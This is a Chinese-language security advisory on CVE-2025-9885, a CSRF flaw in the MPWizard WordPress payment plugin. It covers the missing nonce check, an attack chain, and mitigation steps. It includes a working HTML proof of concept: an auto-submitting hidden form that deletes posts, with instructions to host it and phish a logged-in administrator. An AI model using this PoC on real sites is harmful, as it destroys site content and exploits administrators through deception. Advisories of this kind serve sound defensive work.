CVE-2025-9885：WordPress MPWizard插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-9885

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MPWizard – Create Mercado Pago Payment Links（WordPress插件）

漏洞概述

CVE-2025-9885是WordPress平台上一款名为MPWizard – Create Mercado Pago Payment Links的支付链接插件存在的跨站请求伪造（Cross-Site Request Forgery, CSRF）漏洞。该漏洞由Wordfence安全团队的安全研究员发现并报告，于2025年10月3日正式公开披露。

MPWizard插件主要用于帮助WordPress网站管理员快速创建和管理Mercado Pago支付链接，是面向拉丁美洲电商市场的常用支付集成工具。该插件在所有1.2.1及以下版本中均存在CSRF漏洞，CVSS评分为4.3分，属于中危级别。

漏洞的根本原因在于插件的`/includes/admin/class-mpwizard-table.php`文件中缺少或存在错误的Nonce验证机制。Nonce（Number used once）是WordPress用来防止CSRF攻击的核心安全机制，通过在表单提交和URL请求中加入一次性令牌来验证请求来源的合法性。由于该插件未正确实施Nonce验证，攻击者可以利用社会工程学手段，诱导已登录的管理员在不知情的情况下执行恶意操作。

虽然该漏洞需要管理员交互（用户交互标志为UI:R），且攻击者无需事先获得任何认证权限（PR:N），但其危害性仍然不可忽视。攻击成功后，攻击者可以删除站点的任意文章（Posts），从而破坏网站内容的完整性和可用性。对于依赖该插件进行电商交易的网站而言，内容被恶意删除可能导致业务中断和用户信任度下降。

技术细节

该漏洞的技术原理涉及WordPress CSRF防护机制的绕过和HTTP请求伪造。

**Nonce机制缺失分析**：
WordPress通过`wp_nonce_field()`函数在表单中生成一次性令牌，通过`check_admin_referer()`或`wp_verify_nonce()`函数在服务端进行验证。在MPWizard插件的`class-mpwizard-table.php`文件的第157行附近，存在一个用于删除文章（post）的操作端点，但该端点在处理删除请求时未正确调用Nonce验证函数，或者完全省略了验证步骤。

**漏洞触发流程**：
1. 攻击者首先分析目标网站，确认其安装了MPWizard插件且版本在1.2.1及以下。
2. 攻击者构造一个恶意的HTML页面或链接，其中包含一个针对目标网站删除文章端点的隐藏表单或图片请求。该请求利用了管理员的浏览器自动携带Cookie的特性。
3. 攻击者通过钓鱼邮件、评论或其他社会工程学手段，诱骗已登录的管理员点击该恶意链接或访问恶意页面。
4. 管理员的浏览器在不知情的情况下向目标网站发送删除文章的请求，由于服务器未验证Nonce，请求被成功处理，指定文章被删除。

**利用条件分析**：
- 攻击向量为网络（AV:N），攻击者可通过互联网远程发起攻击。
- 攻击复杂度低（AC:L），无需特殊技术条件。
- 无需认证（PR:N），攻击者无需拥有目标站点的任何账号。
- 需要用户交互（UI:R），需要管理员点击恶意链接。
- 完整性影响为低（I:L），仅能删除文章，无法获取敏感数据或执行代码。

**漏洞影响范围**：
所有使用MPWizard插件1.2.1及以下版本的WordPress网站均受此漏洞影响。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过WordPress的插件目录、HTTP响应头或公开信息，识别目标网站是否安装了MPWizard插件，并确认其版本在1.2.1及以下。

STEP 2

步骤2：构造恶意页面

攻击者创建一个包含CSRF利用代码的HTML页面，该页面包含一个自动提交的表单，目标是MPWizard插件中未受Nonce保护的删除文章端点。

STEP 3

步骤3：社会工程诱导

攻击者通过钓鱼邮件、社交媒体或受感染的网站，诱骗已登录目标WordPress站点的管理员点击恶意链接或访问恶意页面。

STEP 4

步骤4：CSRF请求触发

管理员浏览器在不知情的情况下，自动向目标网站发送带有管理员Cookie的删除文章请求。由于服务器未验证Nonce，请求被成功处理。

STEP 5

步骤5：文章被删除

目标文章被恶意删除，网站内容完整性遭到破坏。攻击者可根据需要重复上述过程，批量删除重要内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-9885 CSRF PoC - Unauthenticated Post Deletion via MPWizard Plugin -->
<!-- Attacker hosts this HTML on a malicious server and tricks an admin into visiting it -->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Loading...</title>
</head>
<body>
    <!-- Auto-submitting form to delete an arbitrary post on the vulnerable WordPress site -->
    <form id="csrf-form" action="https://target-wordpress-site.com/wp-admin/admin.php" method="POST">
        <!-- The 'page' parameter targets the MPWizard admin page -->
        <input type="hidden" name="page" value="mpwizard" />
        <!-- The 'action' parameter triggers the delete operation -->
        <input type="hidden" name="action" value="delete" />
        <!-- The 'post_id' parameter specifies the post to be deleted (change as needed) -->
        <input type="hidden" name="post_id" value="1" />
        <!-- No nonce field is required because the plugin fails to validate it -->
    </form>

    <script>
        // Auto-submit the form when the page loads
        document.getElementById('csrf-form').submit();
    </script>

    <!-- Alternative: Use an image tag to trigger a GET-based deletion if supported -->
    <!-- <img src="https://target-wordpress-site.com/wp-admin/admin.php?page=mpwizard&action=delete&post_id=1" style="display:none" /> -->
</body>
</html>

<!--
Usage Instructions:
1. Replace "https://target-wordpress-site.com" with the target WordPress site URL.
2. Replace the "post_id" value with the ID of the post you wish to delete.
3. Host this HTML file on an attacker-controlled server.
4. Trick a logged-in administrator into visiting this page (e.g., via phishing email).
5. Upon visiting, the form auto-submits and the targeted post will be deleted.
-->

影响范围

MPWizard – Create Mercado Pago Payment Links <= 1.2.1

防御指南

临时缓解措施

在官方修复版本发布之前，建议管理员立即禁用MPWizard插件以消除风险。如果无法立即禁用，应限制管理员账号的访问权限，仅在必要时登录管理后台，并避免点击任何可疑链接。同时，启用Wordfence等安全插件的CSRF防护功能，密切监控管理后台的操作日志，特别关注异常的POST请求和文章删除操作。建议对网站进行完整备份，以便在遭受攻击后能够快速恢复被删除的内容。